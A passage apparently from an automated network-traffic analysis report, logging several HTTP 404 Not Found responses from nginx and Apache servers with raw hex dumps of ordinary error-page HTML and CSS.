Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:27:04 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:27:06 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:27:09 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:27:11 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 23 Aug 2024 06:27:32 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 23 Aug 2024 06:27:34 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 